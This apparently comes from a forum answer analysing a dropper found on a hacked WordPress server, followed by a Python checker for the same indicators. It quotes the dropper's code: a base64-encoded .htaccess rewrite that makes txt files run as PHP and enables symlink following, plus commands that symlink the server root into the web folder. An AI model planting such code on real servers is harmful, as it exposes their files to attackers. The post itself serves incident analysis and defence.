Once the file is uploaded to the server (exploiting a bug in a WordPress theme), the `.htaccess` is reconfigured in a way that any `.txt` file will be interpreted by the server as a `.php` script and it will follow symlinks. The next step is the trick: he makes a symlink from `Donnazmi.txt` (2 ways).
The code isn't really complex; it prints an HTML form with the needed configs to run the exploit steps (you need to send a POST request with `Donnazmi` as a POST key to see it).

```php
$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
```
This is a base64 encoded string, which translates into:

```
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
```
So with that config:

```php
$file  = fopen(".htaccess", "w+");                 // open the file
$write = fwrite($file, base64_decode($fvckem));    // write the new config inside the file
```

```php
// 1. this is a link made with the linux command `ln`
system('ln -s / Donnazmi.txt');
// 2. this is a link made with the php native function
$Donnazmi = symlink("/", "Donnazmi.txt");
```
After the execution, each time he visits `example.com/Donnazmi.txt` he sees a list of the root directory of your server (`Options Indexes`, tm).

So yes, rebuild that machine, and check the software before installing it.
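For anyone auditing a server for this pattern, here is an added example (my own code, not part of the answer above or the dropper) that checks the two indicators the answer describes from the defender's side: an `.htaccess` that enables directory listings and symlink following and wires PHP into `AddType`/`AddHandler`/`SetHandler`, and symlinks inside the web root that resolve to a path outside it (such as `/`). The `demo()` function builds a constructed temporary web root that mirrors the post-infection state, using the base64 blob from the answer, and scans it; `htaccess_findings()` and `escaping_symlinks()` are the reusable parts you would point at a real document root.

```python
import base64
import os
import tempfile

# Indicators drawn from the .htaccess described in the answer: directory
# listings, symlink following, and handler/type lines that involve PHP.
# None of these belong in a theme or upload directory.
LISTING_OR_SYMLINK_OPTIONS = {"indexes", "followsymlinks", "symlinksifownermatch"}
HANDLER_DIRECTIVES = {"addtype", "addhandler", "sethandler"}


def decode_htaccess(b64: str) -> str:
    """Decode a base64 blob into .htaccess text (the dropper's own encoding)."""
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def htaccess_findings(text: str) -> list:
    """Return human-readable findings for suspicious directives in .htaccess text."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive, args = parts[0].lower(), parts[1:]
        if directive == "options":
            for opt in args:
                name = opt.lstrip("+")
                if name.lower() in LISTING_OR_SYMLINK_OPTIONS:
                    findings.append(f"Options enables {name}")
        elif directive in HANDLER_DIRECTIVES:
            # Flag PHP in either position: the sample pairs 'txt' with '.php'.
            if any("php" in a.lower() for a in args):
                findings.append(f"{parts[0]} involves PHP: {line}")
    return findings


def escaping_symlinks(webroot: str) -> list:
    """List (link, target) pairs for symlinks under webroot that resolve outside it."""
    root = os.path.realpath(webroot)
    escapes = []
    # os.walk does not descend into symlinked directories by default, so a
    # link to "/" is reported once rather than walked.
    for dirpath, dirnames, filenames in os.walk(webroot):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([root, target]) != root:
                escapes.append((path, target))
    return escapes


def demo() -> dict:
    """Constructed web root mirroring the answer's post-infection state, then scanned."""
    blob = ("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3Mu"
            "aHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw")
    with tempfile.TemporaryDirectory() as webroot:
        with open(os.path.join(webroot, ".htaccess"), "w") as f:
            f.write(decode_htaccess(blob))
        # The symlink name is the one from the answer; it only exists in the temp dir.
        os.symlink("/", os.path.join(webroot, "Donnazmi.txt"))
        with open(os.path.join(webroot, ".htaccess")) as f:
            findings = htaccess_findings(f.read())
        escapes = [os.path.basename(link) for link, _ in escaping_symlinks(webroot)]
    return {"findings": findings, "escaping_symlinks": escapes}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real host, run `escaping_symlinks()` against the document root and `htaccess_findings()` over every `.htaccess` found under it; anything flagged in a theme, plugin or uploads directory deserves the same "rebuild" verdict the answer gives, since the web server user evidently had write access there.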
The video that I found was the first thing to come up when I googled the hacker’s name.
Do you have the WordPress Cold Fusion theme installed by any chance?

Here is the so-called Mauritania Attacker's video explaining how he exploits the specific WordPress theme to upload files to the server.